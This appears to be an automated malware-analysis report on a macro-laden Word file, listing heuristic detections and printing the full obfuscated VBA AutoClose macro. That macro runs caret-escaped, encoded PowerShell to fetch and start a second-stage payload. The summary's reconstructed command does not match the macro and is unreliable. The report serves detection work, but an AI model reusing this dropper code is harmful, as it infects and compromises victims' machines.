Verdict: MALICIOUS
Risk Score: 290

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution

Malware Insights
The sample contains VBA macros with an AutoClose function that is triggered when the document is closed. This macro attempts to execute a command-line string that appears to be obfuscated PowerShell. The reconstructed command is 'cmd.exe /c P^WerseLL.exe -EC KABOAGUAdwAtAE8AYg5MAWdCBEAdwB5AEIAZgBaQQkAIQAcAEEA6A8A', which strongly suggests the download and execution of a second-stage payload. The presence of Shell() calls and cmd.exe references in the VBA code further supports this malicious intent.
Heuristics (9)

- ClamAV: Doc.Downloader.00536d-6720548-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.00536d-6720548-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
  `Call VBA.Interaction.Shell(lIqyKAReSODOfKivEQUVOFPefuTaL, (10 / 10) - 1)`
  `Dim VomOOpUZAwoTYZixAVasOfOBEGOR(2)`
- cmd.exe reference in VBA (high, OLE_VBA_CMD). Matched lines in script:
  `On Error Resume Next`
  `ViXpABOXaJawyBonyrOnoFU = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A"`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Matched lines in script:
  `Const elQEXYDixUJUmuJorUQUjoCoZEKIFEVA = 0`
  `Sub AutoClose()`
  `On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography (in document text, OLE body)
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9266 bytes |

SHA-256 of macros.bas: 58341eca0bda8ad9779d1e232668e4a3f770ba3160c2be93194cd021e2849299
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const elQEXYDixUJUmuJorUQUjoCoZEKIFEVA = 0
Sub AutoClose()
    On Error Resume Next
    ViXpABOXaJawyBonyrOnoFU = "cmd.exe /c P^" + Chr(1 + 10 + (75) + 25) + "^W^e^r^s^" + Chr(2 + (35 * 2)) + "^e^L^L^.^e^x^e^ ^-^E^C^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^" + Chr(2 + (35 * 2)) + "^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^" + Chr(1 + 10 + (75) + 25) + "^A^C^I^A^a^A^B^0^A^" + Chr(2 + (35 * 2)) + "^Q^A^c^A^A^6^A^C^8^A"
    mIGAXucAFmEteHOnAhAHViaEkYainiSAH = "^L^w^B^3^A^G^8^A^Y^Q^B^0^A^G^k^A^b^g^B^r^A^" + Chr(2 + (35 * 2)) + "^c^A^b^w^B^v^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^S^A^F^U^A^S^Q^A^v^A^G^w^A^Z^Q^B^2^A^G^8^A^b^g^B^k^A^C^4^A^c^A^B^" + Chr(1 + 10 + (75) + 25) + "^A^" + Chr(2 + (35 * 2)) + "^A^A^P^w^B^s^A^D^0^A^c^g^B^l^A^G^U^A^e^g^B^h^A^D^Q^A^L^g^B^4^A^G^E^A^c^A^A^i^A^C^w^A^I^A^A^k^A^G^U^A^b^g^B^2^A^D^" + Chr(1 + 10 + (75) + 25) + "^A^Q^Q^B^Q^A^F^A^A^R^A^B^B^A^F^Q^A^Q^Q^A^g^A^C^s^A^I^A^A^n^A^F^w^A"
    Dim jeLitYpIQywhaWaDERAadaNOGiVo(2)
    Dim jeLitYpIQywhaWaDERAadaNOGiVo_1(2)
    If InStr(1, "GImubyFaquJa", "jeLitYpIQywhaWaDERAadaNOGiVo") Then
        jeLitYpIQywhaWaDERAadaNOGiVo(0) = InStrRev("GImubyFaquJa", "jeLitYpIQywhaWaDERAadaNOGiVo")
        IsError CVErr(2311)
    End If
    IsError CVErr(101)
    If Len(Oct(2311)) > 1 Then
        jeLitYpIQywhaWaDERAadaNOGiVo(1) = Hex(10 ^ 1)
    End If
    jeLitYpIQywhaWaDERAadaNOGiVo_1(0) = Now
    VarType IsNumeric(CInt("2311"))
    jeLitYpIQywhaWaDERAadaNOGiVo_1(1) = GImubyFaquJa & CStr("2311")
    Dim KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(2)
    Dim KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(2)
    If InStr(6, "jazooLAnIfivitaRE", "KacAgyTIzIrUwYGuaaLETPUfosOfUdYl") Then
        KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(0) = InStrRev("jazooLAnIfivitaRE", "KacAgyTIzIrUwYGuaaLETPUfosOfUdYl")
        IsError CVErr(6357)
    End If
    IsError CVErr(126)
    If Len(Oct(6357)) > 6 Then
        KacAgyTIzIrUwYGuaaLETPUfosOfUdYl(1) = Hex(12 ^ 6)
    End If
    KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(0) = Now
    VarType IsNumeric(CInt("6357"))
    KacAgyTIzIrUwYGuaaLETPUfosOfUdYl_6(1) = jazooLAnIfivitaRE & CStr("6357")
    Dim hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(2)
    Dim hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(2)
    If InStr(6, "VyzaJUuNAPok", "hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV") Then
        hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(0) = InStrRev("VyzaJUuNAPok", "hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV")
        IsError CVErr(6204)
    End If
    IsError CVErr(126)
    If Len(Oct(6204)) > 6 Then
        hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV(1) = Hex(12 ^ 6)
    End If
    hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(0) = Now
    VarType IsNumeric(CInt("6204"))
    hAVeGeCuiLOCUCEjaCyRIvoTeDgIlyhyiuV_6(1) = VyzaJUuNAPok & CStr("6204")
    jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB = "^Y^w^A^w^A^G^Q^A^M^Q^A^y^A^D^E^A^Y^Q^B^m^A^C^4^A^Z^Q^B^4^A^G^U^A^J^w^A^p^A^D^s^A^I^A^B^T^A^" + Chr(2 + (35 * 2)) + "^Q^A^Y^Q^B^y^A^" + Chr(2 + (35 * 2)) + "^Q^A^L^Q^B^Q^A^" + Chr(2 + (35 * 2)) + "^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^G^M^A^M^A^B^k^A^D^E^A^M^g^A^x^A^G^E^A^Z^g^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^" + Chr(2 + (35 * 2)) + "^Q^A"
    aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf = "^O^w^A^="
    Dim tAqiCykAdERmaZCoayPywoxUWeWAaaw(2)
    Dim tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(2)
    If InStr(10, "tuEvISdEXIraiNa", "tAqiCykAdERmaZCoayPywoxUWeWAaaw") Then
        tAqiCykAdERmaZCoayPywoxUWeWAaaw(0) = InStrRev("tuEvISdEXIraiNa", "tAqiCykAdERmaZCoayPywoxUWeWAaaw")
        IsError CVErr(52)
    End If
    IsError CVErr(1210)
    If Len(Oct(52)) > 10 Then
        tAqiCykAdERmaZCoayPywoxUWeWAaaw(1) = Hex(12 ^ 10)
    End If
    tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(0) = Now
    VarType IsNumeric(CInt("52"))
    tAqiCykAdERmaZCoayPywoxUWeWAaaw_10(1) = tuEvISdEXIraiNa & CStr("52")
    Call aENyXesUfusaVaSPIKUhYiORIraxY(ViXpABOXaJawyBonyrOnoFU & "", mIGAXucAFmEteHOnAhAHViaEkYainiSAH + CStr(""), jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, "yoq1duqp2710suq", aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf)
End Sub
Sub aENyXesUfusaVaSPIKUhYiORIraxY(ViXpABOXaJawyBonyrOnoFU, mIGAXucAFmEteHOnAhAHViaEkYainiSAH, jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, PAlYaUxOPaciaugaGYQAbOfAPovAVaDaHa, aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf)
    On Error Resume Next
    Dim BikeLEserpaxiLocYhAifiJOvICUqi(2)
    Dim BikeLEserpaxiLocYhAifiJOvICUqi_2(2)
    If InStr(2, "LUqoVIWyiACQYSeBEcy", "BikeLEserpaxiLocYhAifiJOvICUqi") Then
        BikeLEserpaxiLocYhAifiJOvICUqi(0) = InStrRev("LUqoVIWyiACQYSeBEcy", "BikeLEserpaxiLocYhAifiJOvICUqi")
        IsError CVErr(9833)
    End If
    IsError CVErr(112)
    If Len(Oct(9833)) > 2 Then
        BikeLEserpaxiLocYhAifiJOvICUqi(1) = Hex(11 ^ 2)
    End If
    BikeLEserpaxiLocYhAifiJOvICUqi_2(0) = Now
    VarType IsNumeric(CInt("9833"))
    BikeLEserpaxiLocYhAifiJOvICUqi_2(1) = LUqoVIWyiACQYSeBEcy & CStr("9833")
    Dim aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(2)
    Dim aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(2)
    If InStr(9, "iabYCuByePAjaReha", "aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu") Then
        aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(0) = InStrRev("iabYCuByePAjaReha", "aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu")
        IsError CVErr(4771)
    End If
    IsError CVErr(119)
    If Len(Oct(4771)) > 9 Then
        aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu(1) = Hex(11 ^ 9)
    End If
    aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(0) = Now
    VarType IsNumeric(CInt("4771"))
    aicIrUWOKybUHJArbEgeJIJyLeaYlaRVUpUqu_9(1) = iabYCuByePAjaReha & CStr("4771")
    Dim vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(2)
    Dim vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(2)
    If InStr(3, "HUtuDAbAKiNADEwiL", "vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl") Then
        vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(0) = InStrRev("HUtuDAbAKiNADEwiL", "vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl")
        IsError CVErr(9755)
    End If
    IsError CVErr(133)
    If Len(Oct(9755)) > 3 Then
        vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl(1) = Hex(13 ^ 3)
    End If
    vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(0) = Now
    VarType IsNumeric(CInt("9755"))
    vukApUsOiONaFEkicAFatoZyloVuayYGyWyWEPEl_3(1) = HUtuDAbAKiNADEwiL & CStr("9755")
    Dim LOzOCeVifOdOsUxdYTimyTfbIxE(2)
    Dim LOzOCeVifOdOsUxdYTimyTfbIxE_10(2)
    If InStr(10, "DlecOlaHAVIvIgeHA", "LOzOCeVifOdOsUxdYTimyTfbIxE") Then
        LOzOCeVifOdOsUxdYTimyTfbIxE(0) = InStrRev("DlecOlaHAVIvIgeHA", "LOzOCeVifOdOsUxdYTimyTfbIxE")
        IsError CVErr(7812)
    End If
    IsError CVErr(1010)
    If Len(Oct(7812)) > 10 Then
        LOzOCeVifOdOsUxdYTimyTfbIxE(1) = Hex(10 ^ 10)
    End If
    LOzOCeVifOdOsUxdYTimyTfbIxE_10(0) = Now
    VarType IsNumeric(CInt("7812"))
    LOzOCeVifOdOsUxdYTimyTfbIxE_10(1) = DlecOlaHAVIvIgeHA & CStr("7812")
    Dim wEBEwUxatOdyxyAJdiHuneCOtZaBu(2)
    Dim wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(2)
    If InStr(3, "PiCicekeNINFTa", "wEBEwUxatOdyxyAJdiHuneCOtZaBu") Then
        wEBEwUxatOdyxyAJdiHuneCOtZaBu(0) = InStrRev("PiCicekeNINFTa", "wEBEwUxatOdyxyAJdiHuneCOtZaBu")
        IsError CVErr(5060)
    End If
    IsError CVErr(133)
    If Len(Oct(5060)) > 3 Then
        wEBEwUxatOdyxyAJdiHuneCOtZaBu(1) = Hex(13 ^ 3)
    End If
    wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(0) = Now
    VarType IsNumeric(CInt("5060"))
    wEBEwUxatOdyxyAJdiHuneCOtZaBu_3(1) = PiCicekeNINFTa & CStr("5060")
    lIqyKAReSODOfKivEQUVOFPefuTaL = Join(Array(ViXpABOXaJawyBonyrOnoFU, mIGAXucAFmEteHOnAhAHViaEkYainiSAH, jResOzUSFyxESiiObUHUsAzobuBiCoZAHuBYB, aOkaaWeWAgPUKYMEwAKYJuQurEVUpyf), "")
    Call VBA.Interaction.Shell(lIqyKAReSODOfKivEQUVOFPefuTaL, (10 / 10) - 1)
    Dim VomOOpUZAwoTYZixAVasOfOBEGOR(2)
    Dim VomOOpUZAwoTYZixAVasOfOBEGOR_10(2)
    If InStr(10, "hOvUmyZkUFO", "VomOOpUZAwoTYZixAVasOfOBEGOR") Then
        VomOOpUZAwoTYZixAVasOfOBEGOR(0) = InStrRev("hOvUmyZkUFO", "VomOOpUZAwoTYZixAVasOfOBEGOR")
        IsError CVErr(3068)
    End If
    IsError CVErr(1110)
    If Len(Oct(3068)) > 10 Then
        VomOOpUZAwoTYZixAVasOfOBEGOR(1) = Hex(11 ^ 10)
    End If
    VomOOpUZAwoTYZixAVasOfOBEGOR_10(0) = Now
    VarType IsNumeric(CInt("3068"))
    VomOOpUZAwoTYZixAVasOfOBEGOR_10(1) = hOvUmyZkUFO & CStr("3068")
    Dim vebanoiUneroCYpofdoQYCoLEzOPIqytoR(2)
    Dim vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(2)
    If InStr(10, "nAsUZitiGEaYr", "vebanoiUneroCYpofdoQYCoLEzOPIqytoR") Then
        vebanoiUneroCYpofdoQYCoLEzOPIqytoR(0) = InStrRev("nAsUZitiGEaYr", "vebanoiUneroCYpofdoQYCoLEzOPIqytoR")
        IsError CVErr(4717)
    End If
    IsError CVErr(1210)
    If Len(Oct(4717)) > 10 Then
        vebanoiUneroCYpofdoQYCoLEzOPIqytoR(1) = Hex(12 ^ 10)
    End If
    vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(0) = Now
    VarType IsNumeric(CInt("4717"))
    vebanoiUneroCYpofdoQYCoLEzOPIqytoR_10(1) = nAsUZitiGEaYr & CStr("4717")
    Dim QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(2)
    Dim QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(2)
    If InStr(10, "HOhONoxAvYqePORES", "QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi") Then
        QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(0) = InStrRev("HOhONoxAvYqePORES", "QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi")
        IsError CVErr(7626)
    End If
    IsError CVErr(1010)
    If Len(Oct(7626)) > 10 Then
        QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi(1) = Hex(10 ^ 10)
    End If
    QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(0) = Now
    VarType IsNumeric(CInt("7626"))
    QEaapUNezeSuBiLeVuTaxAsEPJYlASViLOi_10(1) = HOhONoxAvYqePORES & CStr("7626")
End Sub
```